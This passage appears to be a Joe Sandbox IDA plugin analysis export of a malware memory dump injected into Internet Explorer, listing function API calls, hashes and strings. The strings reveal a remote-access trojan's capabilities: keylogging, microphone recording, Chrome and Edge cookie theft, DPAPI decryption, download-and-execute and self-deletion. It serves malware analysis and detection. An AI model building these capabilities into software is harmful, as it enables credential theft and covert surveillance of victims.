                                                  • Instruction ID: d1d6694dba9b1c1b3b4714d8291a03d238830f4b57c9d1b6fbaa3df715621df9
                                                  • Opcode Fuzzy Hash: d170df7988f2347194076267de0e4f909b13005d6ffdc9d16566672462b32290
                                                  • Instruction Fuzzy Hash: 4451C271D40249EBCB12FB649CA59EAB7BDEF45720F1006AAD95697380E7308D41CF60
                                                  APIs
                                                    • Part of subcall function 02D8C048: GetCurrentProcess.KERNEL32(?,?,?,02D82240), ref: 02D8C059
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D7F956
                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 02D7F97A
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 02D7F989
                                                  • CloseHandle.KERNEL32(00000000), ref: 02D7FB40
                                                    • Part of subcall function 02D8C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,02D7F634,00000000,?,?,02DE5348), ref: 02D8C08B
                                                    • Part of subcall function 02D8C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 02D8C286
                                                    • Part of subcall function 02D8C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 02D8C299
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 02D7FB31
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 4269425633-0
                                                  • Opcode ID: 969d794c9da6dfec5b915f8e285af1f7f2cae4e1b528e0f86dff3eb37ed7c2c0
                                                  • Instruction ID: 0c1257d7bdf1a03e2bd3d6e74b7e194d506e8a619780ca43938d035bc7a06bd3
                                                  • Opcode Fuzzy Hash: 969d794c9da6dfec5b915f8e285af1f7f2cae4e1b528e0f86dff3eb37ed7c2c0
                                                  • Instruction Fuzzy Hash: 0E41C3315082419BD325FB65D851AFFB3AAEF94300F50491DE58E863D4FF389E4ACA62
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 1712cd24a790d42285c2ff1bc34a5507d66b63216554d90cf135dcdfb06f066f
                                                  • Instruction ID: acfb0a2042a701e4f4e9f69e72e3cf111658ef658854dedf5bb227576bf86f13
                                                  • Opcode Fuzzy Hash: 1712cd24a790d42285c2ff1bc34a5507d66b63216554d90cf135dcdfb06f066f
                                                  • Instruction Fuzzy Hash: 9241D036E00200DFDB11DF78C8A4A99B3B6EF88714F1545A9E956EB381DB31ED01DB90
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,02DAF918,?,00000000,?,00000001,?,?,00000001,02DAF918,?), ref: 02DC11F9
                                                  • __alloca_probe_16.LIBCMT ref: 02DC1231
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02DC1282
                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,02DAAF04,?), ref: 02DC1294
                                                  • __freea.LIBCMT ref: 02DC129D
                                                    • Part of subcall function 02DB61B8: HeapAlloc.KERNEL32(00000000,02DA5349,?,?,02DA88C7,?,?,pth_unenc,?,?,02D7DE9D,02DA5349,?,?,?,?), ref: 02DB61EA
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                                  • String ID:
                                                  • API String ID: 1857427562-0
                                                  • Opcode ID: 622003841b25e415e81e7e3616affc7137f6f636d9474db641a1375d20645eb4
                                                  • Instruction ID: f4634cf7181537623c87ade02840752080fa6b5e7a80699b8da13b0a4282d01f
                                                  • Opcode Fuzzy Hash: 622003841b25e415e81e7e3616affc7137f6f636d9474db641a1375d20645eb4
                                                  • Instruction Fuzzy Hash: 8731BD36A0021BABDF259F64DC41EAEBBA5EB40710F248528EC08D7395E735DD61CFA0
                                                  APIs
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 02D71A7D
                                                  • waveInOpen.WINMM(02DE2AC0,000000FF,02DE2AC8,Function_00001B8F,00000000,00000000,00000024), ref: 02D71B13
                                                  • waveInPrepareHeader.WINMM(02DE2A88,00000020), ref: 02D71B67
                                                  • waveInAddBuffer.WINMM(02DE2A88,00000020), ref: 02D71B76
                                                  • waveInStart.WINMM ref: 02D71B82
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                  • String ID:
                                                  • API String ID: 1356121797-0
                                                  • Opcode ID: a3ae7230d94211499698ffdebf0455385825d08c712c48b346908929c6364fab
                                                  • Instruction ID: e9828866ef92e135e25f33c5e5ff676aa35bda0f32ca5a9f1a8501e190567d20
                                                  • Opcode Fuzzy Hash: a3ae7230d94211499698ffdebf0455385825d08c712c48b346908929c6364fab
                                                  • Instruction Fuzzy Hash: DA211071D88201DEEF28BF65F81D5657BAEFB94710B140919E90ACB790DB744C61CB24
                                                  APIs
                                                  • GetEnvironmentStringsW.KERNEL32 ref: 02DBF3E3
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02DBF406
                                                    • Part of subcall function 02DB61B8: HeapAlloc.KERNEL32(00000000,02DA5349,?,?,02DA88C7,?,?,pth_unenc,?,?,02D7DE9D,02DA5349,?,?,?,?), ref: 02DB61EA
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02DBF42C
                                                  • _free.LIBCMT ref: 02DBF43F
                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 02DBF44E
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                  • String ID:
                                                  • API String ID: 2278895681-0
                                                  • Opcode ID: 63f20f3641c0765f00fbd989b58138fe1679570be7d4ce4fdbafbb9003b97c74
                                                  • Instruction ID: 59ce469af2af34f1efdad8c48b0ac67b0a6dcfa2a0f4f16d8be34b07b94aae82
                                                  • Opcode Fuzzy Hash: 63f20f3641c0765f00fbd989b58138fe1679570be7d4ce4fdbafbb9003b97c74
                                                  • Instruction Fuzzy Hash: 2201B172A01616BF272317A65CACCFB6A6DEEC6EA43640529FD06D6740DF608C02C5B0
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,02DD6478,00000000,00000000,02D7D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 02D8C4C1
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 02D8C4DE
                                                  • CloseHandle.KERNEL32(00000000), ref: 02D8C4EA
                                                  • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D8C4FB
                                                  • CloseHandle.KERNEL32(00000000), ref: 02D8C508
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandle$CreatePointerWrite
                                                  • String ID:
                                                  • API String ID: 1852769593-0
                                                  • Opcode ID: 5aee82656d37afba51f4fa6110626426da7542568fb44c492628b5c75bbf718a
                                                  • Instruction ID: ce311861190aab3c2e649e0813661118b01a55ce2402899a167725ddd67545ce
                                                  • Opcode Fuzzy Hash: 5aee82656d37afba51f4fa6110626426da7542568fb44c492628b5c75bbf718a
                                                  • Instruction Fuzzy Hash: FD11E571254116FFEB186A28AC88EBB739CEB42364F108A2BF592D23C0D720AC44C630
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 02D811AB
                                                  • int.LIBCPMT ref: 02D811BE
                                                    • Part of subcall function 02D7E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 02D7E10D
                                                    • Part of subcall function 02D7E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 02D7E127
                                                  • std::_Facet_Register.LIBCPMT ref: 02D811FE
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 02D81207
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 02D81225
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                  • String ID:
                                                  • API String ID: 2536120697-0
                                                  • Opcode ID: 616b49d83424ef1d36a6f2a8b5df80c72b0a7df227cb18f0eeab6009fe0c3a85
                                                  • Instruction ID: a0927e06c7472eb8d8ff7435620e66ddbd29446005e19a9fdd25f44b3717be1d
                                                  • Opcode Fuzzy Hash: 616b49d83424ef1d36a6f2a8b5df80c72b0a7df227cb18f0eeab6009fe0c3a85
                                                  • Instruction Fuzzy Hash: 8F11A332900114ABCB14FBA8D815DDEB77ADF40760F10455AE859A7390EB71DE16CFE1
                                                  APIs
                                                  • GetLastError.KERNEL32(02DE52E8,00000000,00000000,02DABCD6,00000000,?,?,02DABD5A,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 02DB831E
                                                  • _free.LIBCMT ref: 02DB8353
                                                  • _free.LIBCMT ref: 02DB837A
                                                  • SetLastError.KERNEL32(00000000,?,02D7F83F), ref: 02DB8387
                                                  • SetLastError.KERNEL32(00000000,?,02D7F83F), ref: 02DB8390
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free
                                                  • String ID:
                                                  • API String ID: 3170660625-0
                                                  • Opcode ID: f601620a8cc988df20ccbd6526009a578099ba9064072532ec0b45cdaf2fcf76
                                                  • Instruction ID: db9aab5cbf7968470a98050194a2eb33497ca78bace04cf9c2933e8b8b69364d
                                                  • Opcode Fuzzy Hash: f601620a8cc988df20ccbd6526009a578099ba9064072532ec0b45cdaf2fcf76
                                                  • Instruction Fuzzy Hash: 0801A77A544601E68B1375646C74EEA271EEFC1371B350918F997D6380DB74CC05A620
                                                  APIs
                                                  • _free.LIBCMT ref: 02DC0A54
                                                    • Part of subcall function 02DB6802: RtlFreeHeap.NTDLL(00000000,00000000,?,02DC0CEF,00000000,00000000,00000000,00000000,?,02DC0F93,00000000,00000007,00000000,?,02DC14DE,00000000), ref: 02DB6818
                                                    • Part of subcall function 02DB6802: GetLastError.KERNEL32(00000000,?,02DC0CEF,00000000,00000000,00000000,00000000,?,02DC0F93,00000000,00000007,00000000,?,02DC14DE,00000000,00000000), ref: 02DB682A
                                                  • _free.LIBCMT ref: 02DC0A66
                                                  • _free.LIBCMT ref: 02DC0A78
                                                  • _free.LIBCMT ref: 02DC0A8A
                                                  • _free.LIBCMT ref: 02DC0A9C
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 556059f6499390bdfb57aba81cd0e59ce64e9836e0034ef106350cbb80979ab7
                                                  • Instruction ID: 2e26693aac655dc3ec9a547dc6404217204e48489b0f6c2076d78c53c05f9daf
                                                  • Opcode Fuzzy Hash: 556059f6499390bdfb57aba81cd0e59ce64e9836e0034ef106350cbb80979ab7
                                                  • Instruction Fuzzy Hash: A5F0FF76A08201EB8A21EA5DE491D5A73DEFE00715B748C1DE04ADB780C770FC908EA4
                                                  APIs
                                                  • _free.LIBCMT ref: 02DB4106
                                                    • Part of subcall function 02DB6802: RtlFreeHeap.NTDLL(00000000,00000000,?,02DC0CEF,00000000,00000000,00000000,00000000,?,02DC0F93,00000000,00000007,00000000,?,02DC14DE,00000000), ref: 02DB6818
                                                    • Part of subcall function 02DB6802: GetLastError.KERNEL32(00000000,?,02DC0CEF,00000000,00000000,00000000,00000000,?,02DC0F93,00000000,00000007,00000000,?,02DC14DE,00000000,00000000), ref: 02DB682A
                                                  • _free.LIBCMT ref: 02DB4118
                                                  • _free.LIBCMT ref: 02DB412B
                                                  • _free.LIBCMT ref: 02DB413C
                                                  • _free.LIBCMT ref: 02DB414D
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 56bd796c084f887e4cb8df6bc479f33df1936b9b519cb1cf40c61a75d4dc07ab
                                                  • Instruction ID: 4d3eb2108f55f4ce194d75ea828a0d343c03de6b2ef053f9d5146dee3b70885c
                                                  • Opcode Fuzzy Hash: 56bd796c084f887e4cb8df6bc479f33df1936b9b519cb1cf40c61a75d4dc07ab
                                                  • Instruction Fuzzy Hash: 68F06DB5D84120CFAE23BF14B826849376AFF147603544C0AE8156E790C7308C61CFD2
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 02D76FF7
                                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 02D770DB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DownloadExecuteFileShell
                                                  • String ID: c:\program files (x86)\internet explorer\iexplore.exe$open
                                                  • API String ID: 2825088817-673298722
                                                  • Opcode ID: 3a482e04f1f47d3f5d249285dc5b9dd86faa5004242d02b1b2acc5c84a7c0049
                                                  • Instruction ID: 16c0b5a1b0a4c661d8a3df9a4435d80cb660e16e59f5ba3227f2d1df008050c7
                                                  • Opcode Fuzzy Hash: 3a482e04f1f47d3f5d249285dc5b9dd86faa5004242d02b1b2acc5c84a7c0049
                                                  • Instruction Fuzzy Hash: 35619032B0420156EA14FA74D8659BEB7BADF85754F800A1CE846573C4FE6CCE09CBB2
                                                  APIs
                                                  • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 02D83AF7
                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 02D83B26
                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 02D83BC6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Enum$InfoQueryValue
                                                  • String ID: [regsplt]
                                                  • API String ID: 3554306468-4262303796
                                                  • Opcode ID: 560a26cf048d303bc880017c7fc9b04a2c48e16896aef28a331c1b17a4053fe3
                                                  • Instruction ID: 99ab2065c86f094a32f667e9974472ac39fcf0c50e3ba66cba3ca28715b384af
                                                  • Opcode Fuzzy Hash: 560a26cf048d303bc880017c7fc9b04a2c48e16896aef28a331c1b17a4053fe3
                                                  • Instruction Fuzzy Hash: F0512D72900119AADB11EB95DC95EEEB77EEF14304F5001A5E50AE2290FF74AE48CFB0
                                                  APIs
                                                  • _strpbrk.LIBCMT ref: 02DBE7B8
                                                  • _free.LIBCMT ref: 02DBE8D5
                                                    • Part of subcall function 02DABD68: IsProcessorFeaturePresent.KERNEL32(00000017,02DABD3A,02D7F83F,?,?,00000000,02D7F83F,00000000,?,?,02DABD5A,00000000,00000000,00000000,00000000,00000000), ref: 02DABD6A
                                                    • Part of subcall function 02DABD68: GetCurrentProcess.KERNEL32(C0000417,?,02D7F83F), ref: 02DABD8C
                                                    • Part of subcall function 02DABD68: TerminateProcess.KERNEL32(00000000,?,02D7F83F), ref: 02DABD93
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                  • String ID: *?$.
                                                  • API String ID: 2812119850-3972193922
                                                  • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                  • Instruction ID: e43163740001b7fc134dbc917b8dd248b5a29f9ebbf878a1fb5b82b98d76ac18
                                                  • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                  • Instruction Fuzzy Hash: EB519E75E00209EFDF15DFA9C890AEDB7B5EF88314F64816AD846A7300E7319E01CBA0
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,c:\program files (x86)\internet explorer\iexplore.exe,00000104), ref: 02DB3515
                                                  • _free.LIBCMT ref: 02DB35E0
                                                  • _free.LIBCMT ref: 02DB35EA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$FileModuleName
                                                  • String ID: c:\program files (x86)\internet explorer\iexplore.exe
                                                  • API String ID: 2506810119-3790112267
                                                  • Opcode ID: 4d4585b9eb7878d62e97e027581b3a056b585bf0382f8bf4d4ddd90a86e98bca
                                                  • Instruction ID: 74394abbbd870a9cab2d4c6183aba405c1b83250eae7e81b2adbce706ace5a3e
                                                  • Opcode Fuzzy Hash: 4d4585b9eb7878d62e97e027581b3a056b585bf0382f8bf4d4ddd90a86e98bca
                                                  • Instruction Fuzzy Hash: BE3163B1E44258EFDB62DB999894DDEBBFDEF84310F1040A6E80697300D7718E41DBA0
                                                  APIs
                                                    • Part of subcall function 02D7C561: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 02D7C594
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 02D7C727
                                                  • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 02D7C792
                                                  Strings
                                                  • User Data\Profile ?\Network\Cookies, xrefs: 02D7C73F
                                                  • User Data\Default\Network\Cookies, xrefs: 02D7C70D
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                  • API String ID: 1174141254-1980882731
                                                  • Opcode ID: 3073cb5d42d47825058cc484184ce3a8e880d88666202bdea0681d0f909cce8d
                                                  • Instruction ID: 41217c45c53fbf7abc53c2f5430a74c6b86e8184fc8c577867acd2e22630aa97
                                                  • Opcode Fuzzy Hash: 3073cb5d42d47825058cc484184ce3a8e880d88666202bdea0681d0f909cce8d
                                                  • Instruction Fuzzy Hash: D621D07291011A9ACB14FBB5EC55CEEB77EEE50711F500115E506A3290FF28DD4ACEB0
                                                  APIs
                                                    • Part of subcall function 02D7C4FE: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 02D7C531
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 02D7C658
                                                  • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 02D7C6C3
                                                  Strings
                                                  • User Data\Profile ?\Network\Cookies, xrefs: 02D7C670
                                                  • User Data\Default\Network\Cookies, xrefs: 02D7C63E
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                  • API String ID: 1174141254-1980882731
                                                  • Opcode ID: 5a60513834f7834534316179ea74e1c6d8ba7729ef2475427056ee2bc6b51b40
                                                  • Instruction ID: 38517d44860f2c37967879533d43646892dc7e3014565d77ecff2ac6c99b59bc
                                                  • Opcode Fuzzy Hash: 5a60513834f7834534316179ea74e1c6d8ba7729ef2475427056ee2bc6b51b40
                                                  • Instruction Fuzzy Hash: 2421CF7291011A9ACB14FBA1DC55CEEB77EEE50715F400526E506A3290FF289D4ACAB0
                                                  APIs
                                                  • CreateThread.KERNEL32(00000000,00000000,02D7A2B8,?,00000000,00000000), ref: 02D7A239
                                                  • CreateThread.KERNEL32(00000000,00000000,02D7A2A2,?,00000000,00000000), ref: 02D7A249
                                                  • CreateThread.KERNEL32(00000000,00000000,02D7A2C4,?,00000000,00000000), ref: 02D7A255
                                                    • Part of subcall function 02D7B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 02D7B1AD
                                                    • Part of subcall function 02D7B19F: wsprintfW.USER32 ref: 02D7B22E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread$LocalTimewsprintf
                                                  • String ID: Offline Keylogger Started
                                                  • API String ID: 465354869-4114347211
                                                  • Opcode ID: 15eb4c5336bfbd8367a444dea63d9d01cd5b5c51b1261e123cc6a8e752c28c87
                                                  • Instruction ID: da3611093911262b73b581ca2ed0bfadbc37eb1e3b88f1e267134ae7946ed522
                                                  • Opcode Fuzzy Hash: 15eb4c5336bfbd8367a444dea63d9d01cd5b5c51b1261e123cc6a8e752c28c87
                                                  • Instruction Fuzzy Hash: 0E11CAB12002087EA220BB35DC8ACBF775EDA91398F50451DF84612385FA69AD18CEF2
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 02D76ABD
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D76AC4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: CryptUnprotectData$crypt32
                                                  • API String ID: 2574300362-2380590389
                                                  • Opcode ID: 73671bfac09d778027838a66706c0adf4b6123563bb79a36767fd0852e9ae65d
                                                  • Instruction ID: 9c09f57194cae16f66b8c759ecd4fbfd5cc99dfba53ea4cb0158e17fc851992a
                                                  • Opcode Fuzzy Hash: 73671bfac09d778027838a66706c0adf4b6123563bb79a36767fd0852e9ae65d
                                                  • Instruction Fuzzy Hash: FD01DE31A04606ABDF18CFA898549AABBBCAB49300B004169E84593300EB30DD04C6E0
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,02D75159), ref: 02D75173
                                                  • CloseHandle.KERNEL32(?), ref: 02D751CA
                                                  • SetEvent.KERNEL32(?), ref: 02D751D9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEventHandleObjectSingleWait
                                                  • String ID: Connection Timeout
                                                  • API String ID: 2055531096-499159329
                                                  • Opcode ID: d958b00b6f68f6706b54df39eaa357d922400be84ce12369dfcc89e3607536e0
                                                  • Instruction ID: d5bc3a147700055ea0b52e9abb0abc16212e2ab81acbcb76ad3217c93148577b
                                                  • Opcode Fuzzy Hash: d958b00b6f68f6706b54df39eaa357d922400be84ce12369dfcc89e3607536e0
                                                  • Instruction Fuzzy Hash: 1301D835680F41AFE7216B35A89546BFBE5EF00306794092DDDC342B65EB249C10CF62
                                                  APIs
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 02D7E86E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Exception@8Throw
                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                  • API String ID: 2005118841-1866435925
                                                  • Opcode ID: 39d66412ed4fabebc833be05a724016c537640b2096e8a5e78188b1a5b792448
                                                  • Instruction ID: 858fd5542ba46c4ac2573c7fea19380aa67534c153ca5a4ba37602058d7143c3
                                                  • Opcode Fuzzy Hash: 39d66412ed4fabebc833be05a724016c537640b2096e8a5e78188b1a5b792448
                                                  • Instruction Fuzzy Hash: 1301F460A403487FFB14EA94DC52FBE736ADB50700F8484D9AD5269781FB6C6E05CA72
                                                  Strings
                                                  • c:\program files (x86)\internet explorer\iexplore.exe, xrefs: 02D776FF
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: c:\program files (x86)\internet explorer\iexplore.exe
                                                  • API String ID: 0-3790112267
                                                  • Opcode ID: 0e708213bbece12b56c64f0f91ba1c23e1771bead4c17cf530cbdce56b4feac7
                                                  • Instruction ID: 3c5cbc6d06bd5ad6a7929abbcd2f9ef20492eeb22d4aff21bd96252a937badad
                                                  • Opcode Fuzzy Hash: 0e708213bbece12b56c64f0f91ba1c23e1771bead4c17cf530cbdce56b4feac7
                                                  • Instruction Fuzzy Hash: D3F09671F90192DBEF40763468286BE775AD785346F800C25E547CA398FBA88C62C660
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 02D7DFEC
                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 02D7E02B
                                                    • Part of subcall function 02DA56CD: _Yarn.LIBCPMT ref: 02DA56EC
                                                    • Part of subcall function 02DA56CD: _Yarn.LIBCPMT ref: 02DA5710
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 02D7E051
                                                  Strings
                                                  Memory Dump Source
